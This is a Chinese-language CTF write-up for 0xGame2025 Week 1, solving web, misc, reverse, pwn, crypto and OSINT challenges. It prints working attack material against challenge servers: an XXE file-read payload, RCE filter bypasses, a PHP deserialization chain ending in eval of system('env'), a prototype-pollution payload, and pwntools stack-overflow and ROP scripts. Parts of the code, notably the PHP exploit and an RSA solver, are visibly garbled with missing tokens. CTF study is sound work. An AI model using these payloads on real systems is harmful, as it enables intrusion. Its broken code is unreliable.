是 0xGame2025 Week1 的全题型解题报告,涵盖 Web、Misc、Reverse、Pwn、Crypto 及 Osint 六大方向。Web 部分涉及弱口令、XXE、RCE 绕过、PHP 反序列化及原型链污染;Misc 包含 Base64/凯撒隐写、ZIP 文件分析及磁盘镜像提取;Reverse 涉及 ELF 分析、脱壳及 Z3 求解;Pwn 涵盖命令执行绕过、栈溢出及 ROP 链构造;Crypto 包括 RSA、TOTP、Diffie-Hellman 及 Vigenere 密码破解;Osint 利用地理信息定位。文中提供了详细的 Payload 构造与 Python 脚本实现。
时代少年团,我们喜欢你
禁用了右键和 F12
事实上一直按 F12 还是可以强制进入或使用快捷键
Ctrl+U
通过题目提示改包
POST /?hello=web HTTP/1.1 Host: 80-42e509c2-93bd-4e6a-9963-f2a827a573d0.challenge.ctfplus.cn Content-Length: 9 Cache-Control: max-age=0 Origin: http://80-42e509c2-93bd-4e6a-9963-f2a827a573d0.challenge.ctfplus.cn Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Safari Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed/exchange;v=b3;q=0.7 Referer: www.mihoyo.com Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: Sean=god Connection: keep-alive Via:clash http=good
登陆界面弱口令直接进入(admin/admin123)
正常输入发现返回 XML 报错,直接打 XSS(经典 payload)
//XML 声明 标识这是一个 XML 1.0 文档 <?xml version="1.0"?> //文档类型定义 (DTD) 开始 声明文档类型是 a,并开始内部 DTD 子集定义 <!DOCTYPE a [ //定义了一个名为 xxe 的实体,指示 XML 解析器去读取服务器文件系统上的 /flag 文件 <!ENTITY xxe SYSTEM "file:///flag"> ]> //对前面定义的实体 xxe 的引用。如果 XML 解析器配置不当且允许处理外部实体,它会将 &xxe; 替换为它从 file:///flag 读取到的内容 <msg>&xxe;</msg>
MD5 过滤了所有命令词 system|cat|flag|ls|echo|nl|rev|more|grep|cd|cp|vi|passthru|shell|vim|sort|strings 和*
在无法使用简单 cat /flag,且过滤了 *,不能使用 f*,所以:
块 system 可以用 print 替代
cat 可以用 tac 进行替代
``表示执行里面的命令
f??? 表示匹配 f 开头的四字文件
ls 可以用 l\s 绕过
Payload:
http://localhost:80/index.php?rce1[]=1 rce2[]=2&rce3=print(`tac /f???`); //rce3=readfile('/'.'fl'.'ag');
PHP 反序化漏洞
逻辑链:
ZZZ::__destruct → __toString → Mi::__toString //当作字符串的时候触发 → GI::__call() //通过访问不存在的 tks() → HI3rd::__invoke //通过调用函数来触发 → HSR::__get() //通过访问不存在的 Elysia → eval
需要满足以下条件有三种方法
$this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei
要求 MD5 和 SHA1 分别相等
a = 1 b = '1' 或者 a = 0 b = 0E1
Error 类
$c->a=new Error("a",1);$c->b=new Error("a",2)
最后的 throw exception,则是利用了 php 中的 GC 回收机制
在 PHP 中,使用引用计数和回收周期来自动管理内存对象的,当一个变量被设置为 NULL,或者没有任何指针指向时,它就会被变成垃圾,被 GC 机制自动回收掉那么这里的就可以理解为,当一个对象没有被引用时,就会被 GC 机制回收,在回收的过程中,它会自动触发_destruct 方法,而这也就是绕过抛出异常的关键点。
则 EXP:
<?php error_reporting(0); class ZZZ { public $yuzuha; function __construct($yuzuha) { $this -> yuzuha = $yuzuha; } function __destruct() { echo "破绽,在这里!" . $this -> yuzuha; } }
class HSR { public $robin="system('env');"; function __get($robin) { echo "4"; $castorice = $this -> robin; eval($castorice); } }
class HI3rd { public $RaidenMei; public $kiana; public $guanxing; function __invoke() { echo "3"; if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === ( -> RaidenMei) && ( -> kiana) === ( -> RaidenMei)) -> guanxing -> Elysia; } }
{ ; { ; = -> furina; (); } }
{ ; { ; = @ -> game -> (); ; } }
= (); -> yuzuha= (); -> yuzuha->game= (); -> yuzuha->game->furina= (); -> yuzuha->game->furina->kiana= (,);-> yuzuha->game->furina->RaidenMei= (,); -> yuzuha->game->furina->guanxing= (); (());
O%3A3%3A%22ZZZ%22%3A1%3A%7Bs%3A6%3A%22yuzuha%22%3BO%3A2%3A%22Mi%22%3A1%3A%7Bs%3A4%3A%22game%22%3BO%3A2%3A%22GI%22%3A1%3A%7Bs%3A6%3A%22furina%22%3BO%3A5%3A%22HI3rd%22%3A3%3A%7Bs%3A9%3A%22RaidenMei%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A0%3A%22%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A2%3Bs%3A7%3A%22%00%2A0file2%3Bs5%3A2C%3A%5CUsers%5Cuser%5CDownloads.php2%3Bs7%3A20%2A0line2%3Bi6%3Bs6%3A20Exception0trace2%3Ba0%3A%7B%7Ds9%3A20Exception0previous2%3BN%3B%7Ds5%3A2kiana2%3BO9%3A2Exception27%3A%7Bs0%3A20%2A0message2%3Bs0%3A22%3Bs7%3A20Exception0string2%3Bs0%3A22%3Bs7%3A20%2A0code2%3Bi1%3Bs7%3A20%2A0file2%3Bs5%3A2C%3A%5CUsers%5Cuser%5CDownloads.php2%3Bs7%3A20%2A0line2%3Bi6%3Bs6%3A20Exception0trace2%3Ba0%3A%7B%7Ds9%3A20Exception0previous2%3BN%3B%7Ds8%3A2guanxing2%3BO3%3A2HSR21%3A%7Bs5%3A2robin2%3Bs4%3A2system87env79%3B2%3B%7D%7D%7D%7D
原型链污染
{ "__init__":{"__globals__":{"os":{"path":{"pardir":","}}}}}
/xxxxmleee.php
和留言板(粉)一样,直接上 xss,无需绕过
Base64 解码,二次凯撒解码
隐写 zip 文件
解压放入 vscode,快捷键 ctrl+shift+F 查找出 flag
随波逐流直接秒
0xGame{🎉👋🕹️2️⃣0️⃣2️⃣5️⃣0️⃣❎🎮🎯🏟️🥳🎊⚽😄}
~$ sudo losetup -fP do_not_enter.dd ~$ sudo losetup -a /dev/loop0: [2096]:536444 (/home/user/Desktop/timu/0xGame_challenge/do_not_enter.dd) ~$ lsblk -f /dev/loop0 NAME FSTYPE FSVER LABEL UUID FSAVAIL FSUSE% MOUNTPOINTS loop0 ├─loop0p1 ext4 1.0 UserShare 5a6be8f0-43f9-4020-a729-510d6d57e95b ├─loop0p2 ext4 1.0 Do_not_enter 643298ec-2a07-4681-9555-addf90de8ae1 ├─loop0p3 ├─loop0p5 ext4 1.0 WebServer f965eed6-3de2-4533-8e06-2c816f9e4574 └─loop0p6 ext4 1.0 SysLogs 650ce632-c57e-41c6-8a3b-c6bf3d4e2193 ~$ sudo mount /dev/loop0p2 /mnt/test ~$ sudo grep -r "0xGame" /mnt/test /mnt/test/syslog:0xGame{WoW_y0u_fouNd_1t?_114514} ~$ sudo umount /mnt/test ~$ sudo losetup -d /dev/loop0 ~$ sudo rmdir /mnt/test
根据官方 wp 提示构造 flag
0xGame{hacker*/home/hacker*.mysecret_It_is_funny_right?_You_hacked_me!!!}
根据题意
welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~$ ls challenge welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~$ cd challenge welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ ls decrypt.sh files hash_value welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ cat hash_value 9e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840 welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ cd files welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ ls 0176a68189f94db9.dat 1b1200177c4ea9ec.dat 3d5834afac4606f8.dat 62c7cb17b04786b4.dat 803de441283368df.dat 9022633201d0114c.dat aafd7b2c75a50f11.dat d44ff49c0c86703c.dat ee9ced0b6f6b601d.dat 04c3188938ce2601.dat 1e799ec864a9c6e8.dat 3f978683d98d9350.dat 668573506f4591d4.dat 85b1fa9c8810f81e.dat 9045070d63b1ba82.dat ad4bb9102e1bcf47.dat d6cda464b6cece86.dat eedeb3f6f9e41d78.dat 057be4fe1cde30fb.dat 262e51b5771342ac.dat faeff862cbe68.dat b3c4f3c74f08c18.dat b4215888550919.dat a9dae1a5ae3d.dat b0e2825f0d65ea5b.dat d82e5ae891779147.dat f9a0df0bab59793e.dat d1f75.dat ab0db97e10219.dat c3941b3f7f9.dat db3059e3957bb.dat c2af2398be243.dat bae761c07b2f671.dat b549a5b2d496b7e9.dat da7dc3e6bc6bdf3a.dat faadc669b558b605.dat fb369625e59728.dat ce2405592b40b.dat c6310dd8b15852d.dat f1208836bddd5.dat eeffa15558f6c.dat a308e1b416229011.dat be7ff44b59fdb173.dat db17491446902782.dat fb39997214835a7c.dat a1c60e654502adb.dat c238f551c0dfa.dat d2ef1486f5e278.dat a52dead5306b5.dat aef159d41403e.dat a3565321a9b54e9.dat beb0ea80f30ac182.dat e0a674e68af70dd8.dat c4df20c497.dat c96670121d28a1.dat d488bbc080a95.dat c8000841d4709e.dat a5e03e8be21985.dat a35f7710f08b577b.dat c1896247fc411b32.dat e3e4bc24de66fedf.dat f603fbd9e689.dat f77c1e377c822e.dat f0f39db60209d.dat a822952922591d.dat c8f0bc6d9b8cc07.dat a57d466ea7c358e5.dat c40b22e73b945e19.dat e52a988f458f55c1.dat ed0896b3b7610a.dat fbea9c21f57df3.dat a311317d4.dat aec809908ea80b.dat cdb77a1d7bafee.dat a596002113e86ca4.dat c591f08d6e11159b.dat e5ef377c00bddb9b.dat e3120d99e55f5a.dat a67d6763b21398.dat e30fc40249a2efe.dat e7494a5a7856418.dat dc3240d91849730.dat a68a7c2e939e17ef.dat c983be904983006.dat e8b9aa1bffec36ca.dat db088f658e0.dat aca851bbc1367b6.dat ca65ad50057.dat f6932380e8e3cf4.dat e9a101a7d71cf77.dat a9c1939a14255c00.dat d044fbebf0550237.dat eb847ead78db6b4.dat c5a608ac5d416b.dat cafcc334fcfbb1.dat ae4accfba22ec.dat fc68253857c088.dat efbc58fc7baf4be.dat aa60db955ef88d3f.dat d3a3c9b6f96c147f.dat ed670741d7010fe.dat welcome031579f-f98-cc-acc1-c7fa6cdac464-c66ccb687-ch48:~/challenge/files$ sha256sum *.dat | grep e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840 e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840 f9a0df0bab59793e.dat welcome031579f-f98-cc-acc1-c7fa6cdac464-c66ccb687-ch48:~/challenge/files$ ./decrypt.sh files/f9a0df0bab59793e.dat : ./decrypt.: No such file directory welcome031579f-f98-cc-acc1-c7fa6cdac464-c66ccb687-ch48:~/challenge/files$ cd ../ welcome031579f-f98-cc-acc1-c7fa6cdac464-c66ccb687-ch48:~/challenge$ ./decrypt.sh files/f9a0df0bab59793e.dat xGame{Welc0me_to_H_w0r1d}
打开即可看见
右键搜索匹配特征,输入 0xGame
运行拿到提示
DIE 打开查看文件类型
得知是 ELF64 直接放如 IDA
双击 str()函数,或者直接丢给 ai 分析
ida9.2.7 右键可以直接 dump,因为版本低,直接使用官方 wp 了
enc=[0x42,0x1A,0x39,0x17,0x1D,0x9,0x51,0x55,0x2C,0x5F,0x63,0xC,0xD,0x16,0x62,0x27,0x55,0x64,0x55,0x26,0x6D,0x6A,0x18,0x34,0x88,0x65,0x6E,0x1C,0x21,0x6E,0x3D,0x23, 0x6A,0x25,0x6B,0x63,0x68,0x7E,0x77,0x75,0x9A,0x7D,0x39,0x43] key = 'raputa0xGame2025' for i in range(len(enc)): print(chr((enc[i]-i)^ord(key[i % len(key)])),end='')
用 DIE 查看发现标准的 UPX 壳
使用 upx 脱壳
IDA 打开查看 puts 函数
解密得到 flag
在 Pity 处断点运行,随机输入即可拿到 flag
考求 z3 求解
用 z3 复现等式
pip install z3-solver
from z3 import * import hashlib sha256='4aba519d4666f5421488afaaf89efdcbe48e7a53f814ce5c1d82b46b55032651' s=Solver() x1=BitVec('x1',32) x2=BitVec('x2',32) x3=BitVec('x3',32) x4=BitVec('x4',32) s.add(3 * x2 + 5 * x1 + 7 * x4 + 2 * x3 == -1445932505) s.add(2 * (2 * (2 * x2 + x3) + x1) + x4 == -672666814) s.add(7 * x2 + 3 * x1 + 5 * x4 + 4 * x3 == 958464147) s.add(((x1 ^ x2) << 6) + ((x3 >> 6) ^ 0x4514) == 123074281) while s.check() == sat: model=s.model() x1_val=model[x1].as_long() x2_val=model[x2].as_long() x3_val=model[x3].as_long() x4_val=model[x4].as_long() flag=f"0xGame{{{x1_val:08x}{x2_val:08x}{x3_val:08x}{x4_val:08x}}}" if hashlib.sha256(flag.encode()).hexdigest()==sha256:#验证是否为正确 flag print(flag) exception=Or(x1!=x1_val,x2!=x2_val,x3!=x3_val,x4!=x4_val)#排除同一解 s.add(exception)
在正常命令中加入无关紧要的分隔符,如:ca\t flag;c'a'r flag
wenyifan@wenyifan-VMware-Virtual-Platform:~/Desktop$ nc nc1.ctfplus.cn 26950 Please input your command,no cat no sh! ca\t flag 0xGame{y0u_c4n_4ls0_3x3cu73_c0mm4nd_w17h0u7_5h_4nd_c47}
很简单的栈溢出
from pwn import * w=remote("nc1.ctfplus.cn",20513) #io=process('./pwn') payload=b'a'*0x38+p64(0x4011F7) w.send(payload) w.interactive()
from pwn import * context.log_level='debug' #io=process('./pwn') io=remote("nc1.ctfplus.cn",16627) io.recvuntil(b"Kore wa shiren da!\n") for i in range(1000): t=io.recvuntil(b"?")[:-3] if b"x" in t: t=t.decode() t = t.replace("x", "*", 1) t=t.encode() num=eval(t) io.sendline(str(num).encode()) io.recvline() io.recvline() io.interactive()
from pwn import * #io=process('./pwn') io=remote("nc1.ctfplus.cn",26572) system=p64(0x401195) sh=p64(0x000000000040201e) rdi=p64(0x000000000040117e) payload=b'a'*0x28+rdi+sh+system io.send(payload) io.interactive()
#io=process('./pwn') io=remote("nc1.ctfplus.cn",49374) payload=b'a'*0x38+p64(0x40119E)+p64(0x401200+2)+p64(0x40122B) #gdb.attach(io) io.sendline(payload) io.interactive()
oathtool --totp -b FZUA6MCDB6YHVZVZCXK4C47ERRG363MR
CyberChef (左侧): 它的目的是进行通用的数据编码/解码、加密/解密等操作。您使用的是 "From Base32" 模块,它的功能就是将 Base32 字符串解码回原始的字节数据。
oathtool --totp -b (右侧): 它的目的是生成一个TOTP(Time-based One-Time Password)。-b 选项告诉它输入的参数(LLEKTHRI4AKSWAMG4EYGFEQT4T4U5D7P)是一个 Base32 编码的密钥,oathtool 会先将这个 Base32 密钥解码成原始字节,然后用这些字节作为种子(seed)和当前时间戳来计算 TOTP 密码,最终输出一个 6 位或 8 位的数字。
import string import hashlib from pwn import * from Crypto.Util.number import * import itertools import re def solve_pow(prefix_end, target_hash): alphabet = string.ascii_letters + string.digits for x in itertools.product(alphabet, repeat=4):.join(x) s = x_str + prefix_end if hashlib.sha256(s.encode()).hexdigest() == target_hash: return x_str return None def decrypt_rsa_prime_n(n, e, c_hex): c_bytes = bytes.fromhex(c_hex) c_int = int.from_bytes(c_bytes, 'little') phi = n - 1 g = GCD(e, phi) print(f"[*] gcd(e, phi) = {g}") if g != 1: print("[!] e and phi are not coprime, cannot decrypt directly") return None d = pow(e, -1, phi) m = pow(c_int, d, n) return m def extract_flag(m_bytes): try: flag_str = m_bytes.decode('utf-8') if '}' in flag_str: end_index = flag_str.index('}') + 1 return flag_str[:end_index] return flag_str : m_bytes m_bytes m_bytes: flag_bytes = byte m_bytes: <= byte <= : flag_bytes += ([byte]) : flag_bytes.decode(, errors=) m_bytes[:] (): : () r = remote(, ) line = r.recvline().decode().strip() () = re.(, line) : () suffix = .group() target_hash = .group() () xxxx = solve_pow(suffix, target_hash) xxxx : () () r.sendlineafter(, xxxx.encode()) r.recvuntil() n = (r.recvline().strip()) r.recvuntil() e = (r.recvline().strip()) r.recvuntil() c_hex = r.recvline().strip().decode() () () () m = decrypt_rsa_prime_n(n, e, c_hex) m : m_bytes = long_to_bytes(m) () flag = extract_flag(m_bytes) () () () Exception e: () : : r.close() : __name__ == : main()
#!/usr/bin/env python3 # exploit_dh_flag.py # Usage: python3 exploit_dh_flag.py import socket import re from hashlib import sha256 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad from Crypto.Util.number import long_to_bytes HOST = "nc1.ctfplus.cn" PORT = 49871 def recv_all_until(sock, marker, timeout=5): sock.settimeout(timeout) data = b"" while True: try: chunk = sock.recv(4096) if not chunk: break data += chunk if marker in data: break except socket.timeout: break return data def main(): with socket.create_connection((HOST, PORT), timeout=10) as s: data = recv_all_until(s, b"Bob's Public Key:") text = data.decode(errors='ignore') print("[+] Server banner:") print(text) s.sendall(b"1\n") print("[+] Sent Bob's public key = 1") more = recv_all_until(s, b"\n", timeout=2) data2 = data + more text2 = data2.decode(errors='ignore') m = re.search(r"Encrypted Flag:\s*([0-9a-fA-F]+)", text2) if not m: try: extra = s.recv(8192) text2 += extra.decode(errors='ignore') m = re.search(r"Encrypted Flag:\s*([0-9a-fA-F]+)", text2) except: pass if not m: print("[-] Couldn't find 'Encrypted Flag' in server response. Full response:") print(text2) return hex_cipher = m.group(1) print("[+] Encrypted Flag (hex):", hex_cipher) ct = bytes.fromhex(hex_cipher) key = sha256(long_to_bytes(1)).digest() cipher = AES.new(key, AES.MODE_ECB) try: pt = unpad(cipher.decrypt(ct), 16) except ValueError as e: print("[-] Unpad/Decrypt error:", e) pt = cipher.decrypt(ct) print("\n[+] Decrypted flag (raw bytes):", pt) try: print("[+] Flag (utf-8):", pt.decode()) except: print("[+] Flag (repr):", repr(pt)) if __name__ == "__main__": main()
from Crypto.Util.number import * from secret import flag p, q = [getPrime(256) for _ in range(2)] n = p * q e = 65537 m = bytes_to_long(flag) c = pow(m, e, n) print(f"n = {n}") print(f"c = {c}") # n = 5288062996177288067805240670327919739339874127477405321607402348589147491552053048231920112750216696782518281218048178087877077018108705271341382858124037 # c = 2454797328903978848197140611862882439826920912955785083080835692389929572917351093371626343669582289242212514789420568997224614087740388703381025018563979
分解 n 得到 p 和 q,计算出 d 值后,再算出 m,最后将 m 转化为字符串
p=60979507724530093051797511853954365018147917052474373616663462193464369184711 q=86718689499194998339746379891242621495538434539975542252458947218776577824467
解密脚本
# -*- coding: utf-8 -*- from Crypto.Util.number import long_to_bytes, inverse # 已知参数 n = 5288062996177288067805240670327919739339874127477405321607402348589147491552053048231920112750216696782518281218048178087877077018108705271341382858124037 c = 2454797328903978848197140611862882439826920912955785083080835692389929572917351093371626343669582289242212514789420568997224614087740388703381025018563979 p = 60979507724530093051797511853954365018147917052474373616663462193464369184711 q = 86718689499194998339746379891242621495538434539975542252458947218776577824467 e = 65537 # ------------------- RSA 私钥恢复 ------------------- # 验证 n = p * q assert n == p * q, "p * q 不等于给出的 n!" # 计算 φ(n) = (p-1)*(q-1) phi = (p - 1) * (q - 1) # 计算私钥 d = e^{-1} mod φ(n) d = inverse(e, phi) # ------------------- 解密 ------------------- # m = c^d mod n m = pow(c, d, n) # 将整数转回字节 → flag flag = long_to_bytes(m) print("flag =", flag.decode()) # 假设 flag 是可打印的 ASCII 字符串
from string import digits, ascii_letters, punctuation ciphertext = 'WL"mKAaequ{q_aY$oz8`wBqLAF_{cku|eYAczt!pmoqAh+' key = "Welcome-2025-0xGame" alphabet = digits + ascii_letters + punctuation def vigenere_decrypt(cipher, key): key_index = 0 for char in cipher: bias = alphabet.index(key[key_index]) char_index = alphabet.index(char) new_index = (char_index - bias) % len(alphabet) plaintext += alphabet[new_index] key_index = (key_index + 1) % len(key) return plaintext flag = vigenere_decrypt(ciphertext, key) print(flag)
#!/usr/bin/env python3 # 最终版:自动解码 + 自动截断随机字节,只输出真实 flag from base64 import b64decode # ======= 把题目输出的四行填在这里(无需加 b'') ======= c0 = "MHhHYW1le7u2063AtLW9MHhHYW1lMjAyNQ==" c1 = "a3accfd6d4dac4e3d2d1beadd1a7bbe143727970746fb5c4bb" c2 = "wqwwwqqaawwwaaqawqwawwwwaaawwwawaqqwwwqaqwwqwaaqwaqqaaawqqqaqaqwaaawwwqaqaaaaqawaqqqwwqqwaqwqwwwawawqqwwqqawqwaqwwawwqwaqqaqwaw" c3 = "5787980659359196741038715872684190805073807486263453249083702093905274294594502252203577660251756609738877887210677202141957646934092054500618364441642896304387589669635034683021946777034215355675802286923927161922717560413551789421376288823912349463080999424773600185557948875343480056576969695671340947861706467351885610345887785319870159654836532664189086047061137903149197973327299859185905186913896041309284477616128" # ===================================================== # ---------- decode part ---------- def decode_awaqaq(s: str) -> bytes: inv = {'a':0, 'w':1, 'q':2} num = 0 for i, ch in enumerate(s): num += inv[ch] * (3 ** i) length = (num.bit_length() + 7) // 8 return num.to_bytes(length, 'big') def integer_kth_root(n: int, k: int) -> int: lo, hi = 1, 1 << ((n.bit_length() // k) + 2) while lo < hi: mid = (lo + hi) // 2 if mid**k <= n: lo = mid + 1 else: hi = mid return lo - 1 # decode each part b0 = b64decode(c0) b1 = bytes.fromhex(c1) b2 = decode_awaqaq(c2) # c3 = (little_int)**7 n = int(c3) x = integer_kth_root(n, 7) seg_len = max(len(b0), len(b1), len(b2)) b3 = x.to_bytes(seg_len, 'little') # combine all bytes all_bytes = b0 + b1 + b2 + b3 # ---------- 自动截断到 '}' ---------- end = all_bytes.find(b"}") if end == -1: raise ValueError("没有找到 '}',可能数据复制错误") flag = all_bytes[:end+1].decode("gb2312", errors="ignore") # ---------- 输出最终 flag ---------- print(flag)
# solve_vigenere_adv.py from string import digits, ascii_letters, punctuation, ascii_lowercase import itertools alphabet = digits + ascii_letters + punctuation key = "QAQ(@.@)" ciphertext = "0l0CSoYM<c;amo_P_" # 题目给的输出 n = len(alphabet) prefix = "0xGame{" suffix = "}" def decrypt_char(c, bias): target_index = alphabet.index(c) candidates = [] for x in range(n): if ((x + bias) * x) % n == target_index: candidates.append(alphabet[x]) return candidates cand_lists = [] for i, c in enumerate(ciphertext): bias = alphabet.index(key[i % len(key)]) cands = decrypt_char(c, bias) if i < len(prefix): cands = [ch for ch in cands if ch == prefix[i]] elif i == len(ciphertext) - 1: cands = [ch for ch in cands if ch == suffix] else: cands = [ch for ch in cands if ch in ascii_lowercase] if not cands: raise ValueError(f"No candidates at position {i} for cipher char {c!r}") cand_lists.append(cands) def encrypt(plaintext, key): key_index = 0 for ch in plaintext: bias = alphabet.index(key[key_index]) char_index = alphabet.index(ch) new_index = ((char_index + bias) * char_index) % n ct += alphabet[new_index] key_index = (key_index + 1) % len(key) return ct candidates = [] for combo in itertools.product(*cand_lists):.join(combo) if encrypt(pt, key) == ciphertext: candidates.append(pt) def score_flag(s): body = s[len(prefix):-1] score = 0 if "excellent" in body: score += 10 return score candidates = sorted(candidates, key=lambda s: -score_flag(s)) print("找到的候选 flag(按可能性排序):") for i, c in enumerate(candidates, 1): print(f"{i}. {c}") if candidates: print("\n最可能的 flag:", candidates[0]) else: print("未找到符合条件的 flag。")
0xGame{大室山_32.1191_118.9265}
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
使用加密算法(如AES、TripleDES、Rabbit或RC4)加密和解密文本明文。 在线工具,加密/解密文本在线工具,online
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML 转 Markdown 互为补充。 在线工具,Markdown 转 HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML 转 Markdown在线工具,online